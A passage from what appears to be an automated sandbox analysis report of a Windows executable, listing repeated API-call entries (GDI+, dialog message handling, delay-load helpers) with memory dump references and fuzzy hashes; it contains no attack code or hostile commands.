                                                            • Opcode Fuzzy Hash: 8949cb0a982df3604e2b4d1931fc56a9c92ff4c6c9feba7db7145bc181e821f5
                                                            • Instruction Fuzzy Hash: 4CD0C210A01098EADB223329381DBFE2A068FFA310F0C0065B64957187CF480982A261
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 001FA62C
                                                              • Part of subcall function 001FA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001FA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: b00aac81db7fd7a65c151781ae060d0d9233be5662d48fb48a66cbf8f356256b
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 91D0A9B020020CBADF026B218C0297E7AAAEF10390F448021BE4AC5191EBB5D910A262
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,001F1B3E), ref: 001FDD92
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: 0415b85aecc97fc82a083eadcfb62529eb83891a236906936eadc813e94f62ab
                                                            • Instruction ID: 812f37217a605eb11ba45bad6b4671fae5c3f759e73980ae7060522004bbf27a
                                                            • Opcode Fuzzy Hash: 0415b85aecc97fc82a083eadcfb62529eb83891a236906936eadc813e94f62ab
                                                            • Instruction Fuzzy Hash: EED09E71148300BBD6126B51DD0AF1A7AE2AB98B04F004554B388740B1C7729D21DB11
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 001FE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 7cec9af7efdfe40a6f7eee0b5a3172bf976233349cd98f012ef7355410fc2ed5
                                                            • Instruction ID: 10cd16df7cd15ce723cb65ccb549dd2c787e94d53073b56c703731d4c2e8a207
                                                            • Opcode Fuzzy Hash: 7cec9af7efdfe40a6f7eee0b5a3172bf976233349cd98f012ef7355410fc2ed5
                                                            • Instruction Fuzzy Hash: 9BD0C9B81D03989AD605FBA8EC8A77436D4B335755F904142B345D64B1DB6444E0CA06
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,001E97BE), ref: 001E98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 81210d432d608c88ebecc2831fd07de1ba505a03c03102faf67ccd68db144bc7
                                                            • Instruction ID: 7dda3ba756b6e26e19c936a34be6ccf1ebe52507900e3370ba578c7b7c56a765
                                                            • Opcode Fuzzy Hash: 81210d432d608c88ebecc2831fd07de1ba505a03c03102faf67ccd68db144bc7
                                                            • Instruction Fuzzy Hash: FBC01234404589858E24862698484DD7312AA933657B48694C028850B1C322CC47EA01
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2cd8f44a4fdaed7b40d83ee8a3b70ad8ce31327f1e26ebeb4a00cff86cc5daff
                                                            • Instruction ID: 819533bfa59d3282f480874d76d6f9597ff6197929518cc80c294177561d0f64
                                                            • Opcode Fuzzy Hash: 2cd8f44a4fdaed7b40d83ee8a3b70ad8ce31327f1e26ebeb4a00cff86cc5daff
                                                            • Instruction Fuzzy Hash: 60B012D92BC244BD311C71461C52C37028DC0D2F20330843EFD0AD0490D940AC500431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6e0068e69aabc0682b9c47883513d185595b5e9ba446ce2b0d1b58bfa26a823e
                                                            • Instruction ID: baea975cbd65be732ebafd819668143574fa81f6c9ef81509c45ef0777553c55
                                                            • Opcode Fuzzy Hash: 6e0068e69aabc0682b9c47883513d185595b5e9ba446ce2b0d1b58bfa26a823e
                                                            • Instruction Fuzzy Hash: 36B012D62BC144BC321CB6061C02C3702CDC0D2B20330C03EFD0EC0190D940AC540431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 398dcd11dbb59651621c3e431f2030519428b0b343f4dbe5510f754dfdb6eeb7
                                                            • Instruction ID: 6ab0466f5ee2e96f630f542fa91165a72697f8717644b7551aa91dfef74ae92a
                                                            • Opcode Fuzzy Hash: 398dcd11dbb59651621c3e431f2030519428b0b343f4dbe5510f754dfdb6eeb7
                                                            • Instruction Fuzzy Hash: 57B012D92BC208BD311CB14A1C42C3702CDC0D1F20330403EF90EC0090D9406C500531
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b44e1abbaac4d1a001db02f0125d90363152c09d96a0daf54ed8c286ed9fb444
                                                            • Instruction ID: f04452127e2556a3ff227d6c4ff949caca7c2fccacb8d0724f1ca15bb3e7b328
                                                            • Opcode Fuzzy Hash: b44e1abbaac4d1a001db02f0125d90363152c09d96a0daf54ed8c286ed9fb444
                                                            • Instruction Fuzzy Hash: EAB012E52BC144BC311CB1061C02D3702CDC0E2F30330813EFD0EC0090D940AD500431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5fd4d39220bb8f2d705d4447a6d69e987bde94ac7b022d012d682c871be27f56
                                                            • Instruction ID: 3abff0c617ee6a2cf0dc3f85fa611a4354532836c34ac95855f6c62af4e06b60
                                                            • Opcode Fuzzy Hash: 5fd4d39220bb8f2d705d4447a6d69e987bde94ac7b022d012d682c871be27f56
                                                            • Instruction Fuzzy Hash: 4AB012D62BC104BC321CB2061D02C3742CDC0D1B20330803EF90EC0190DD516D590431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 95fd5caea466616a0157775665ffe98a2219fdbead43e01709533be8706d403b
                                                            • Instruction ID: 5b78b5f05b4b2c25b7330973bae49490d6cfc9e100812103a169740cfe5cd7a6
                                                            • Opcode Fuzzy Hash: 95fd5caea466616a0157775665ffe98a2219fdbead43e01709533be8706d403b
                                                            • Instruction Fuzzy Hash: A6B012D63BC244BC325CB2061C02C3702CDC0D1B20330853EF90EC0190D9406C940431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: af18a0321cea03ba4a5fdd2732a922ac8f5aa1a6a2932ab80383bb4a512c1926
                                                            • Instruction ID: ce4292485a54b92bfdd6ce68bb0414cb7511566725574d096b4769984186c693
                                                            • Opcode Fuzzy Hash: af18a0321cea03ba4a5fdd2732a922ac8f5aa1a6a2932ab80383bb4a512c1926
                                                            • Instruction Fuzzy Hash: FDB012E52BC104BC311CB1071C02D3742CDC0E1F30330403EF90EC0091D9406D500431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: daf4d4adfac30038482b933de7622f908b3b4fc35669a0cfe6086fa1ad1e0f6e
                                                            • Instruction ID: 92252e3c05bca8210aac3c7c5fa51024e1948e25e2e5ab96f283f0a727c55b73
                                                            • Opcode Fuzzy Hash: daf4d4adfac30038482b933de7622f908b3b4fc35669a0cfe6086fa1ad1e0f6e
                                                            • Instruction Fuzzy Hash: 92B012E52BC104BC311CB1061D02D3742CDC0E1F30330403EF90EC0090DD416E510431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 21f7c7ad5ce0c1f6a5f278c037b01affb2943139f7f5dae3cd280798d5e37876
                                                            • Instruction ID: 70d76656a335f40939b198152d02c031fcee907e9ea6522802a3e2d7af7725c5
                                                            • Opcode Fuzzy Hash: 21f7c7ad5ce0c1f6a5f278c037b01affb2943139f7f5dae3cd280798d5e37876
                                                            • Instruction Fuzzy Hash: ADB012E52BC204BC315CB1061C02D3702CDC0E1F30330413EF90EC0090D9416D900431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c17f19845ca32aacabf01d1c83cf310b0a80d0fd6c556a3e0d016d5499bcb9c3
                                                            • Instruction ID: fe3a6e0c1b2bf986b8533478cb737705e4695786e98f35cfd588c37a1236f7d4
                                                            • Opcode Fuzzy Hash: c17f19845ca32aacabf01d1c83cf310b0a80d0fd6c556a3e0d016d5499bcb9c3
                                                            • Instruction Fuzzy Hash: 0AB012E52BD244BC315CB2061C02C3702CEC1D1B20330413EF90EC0090D9806C940431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e64a9c454815296ded9e0f869b52dd9ef9245979f7c2fb18bbe385c2f1b7a905
                                                            • Instruction ID: 0a78cc0c31acbb9b4212a415f548f1ef8b73456328e284305ee0ec83415433b5
                                                            • Opcode Fuzzy Hash: e64a9c454815296ded9e0f869b52dd9ef9245979f7c2fb18bbe385c2f1b7a905
                                                            • Instruction Fuzzy Hash: 1FB012D52BD184BC311CB1061C02C3702CEC1D2B20330803EFD0EC0090D980AC600431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7becaef2a919886d3c2f877ed58dc2846012bc964dfec38c88d36039c7b45d95
                                                            • Instruction ID: 4af1a3182985257c28ebc6f36c0164ed6e3ef8fe9f64599843a822001f0bc3f6
                                                            • Opcode Fuzzy Hash: 7becaef2a919886d3c2f877ed58dc2846012bc964dfec38c88d36039c7b45d95
                                                            • Instruction Fuzzy Hash: 86B012D92BC144BC311CB1161C02C3702CDC0D2B20330803EFE0ED4090DA40AC500831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
